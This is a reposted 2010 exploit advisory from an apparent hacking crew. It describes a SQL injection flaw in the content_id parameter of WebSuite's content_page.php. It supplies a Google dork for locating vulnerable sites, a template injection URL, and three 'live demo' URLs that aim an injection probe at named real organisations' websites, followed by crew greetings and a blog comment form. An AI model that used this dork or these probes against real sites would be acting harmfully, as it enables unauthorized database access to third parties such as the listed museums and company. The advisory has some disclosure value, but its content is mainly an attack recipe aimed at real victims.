WebSuite content_id SQL Injection Vulnerability

==============================================================
WebSuite content_id SQL Injection Vulnerability
==============================================================

######################################################################
# Exploit Title: WebSuite content_id SQL Injection Vulnerability
# Date: september 21, 2010
# Author: jos_ali_joe
# Category? : Web Apps
# Google Dork : inurl:”content_page.php?content_id”

######################################################################

[$] ExPLo!T : http://www.example.com/html/content_page.php?content_id={sql
injection}

[$] L!ve Demo :
http://www.americanarrowcorp.com/html/content_page.php?content_id=21%27&
;nav_id=3&

[$] L!ve Demo :
http://www.gilmorecarmuseum.org/html/content_page.php?content_id=7%27&

[$] L!ve Demo :
http://www.firemuseum.com/html/content_page.php?content_id=11%27&nav_id
=3&

######################################################################

Thanks :
./kaMtiEz – ibl13Z – Xrobot – tukulesto – N4ck0 – R3m1ck – jundab –
asickboys- Vyc0d – Yur4kha

./ArRay – akatsuchi – K4pt3N – Gameover – antitos – yuki – pokeng – ffadill
– TeRRenJr – aphe-aphe

./Kiddies – Chaer.newbie – Gunslinger_ – Mywisdom – whitehat – Petimati –
hakz – Virgi – Anharku – TeRRenJr

Greets For :
./Devilzc0de crew – Kebumen Cyber – Explore Crew – Indonesian Hacker

My Team : ./Indonesian Coder

http://securityreason.com/wlb_show/WLB-2010090105

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s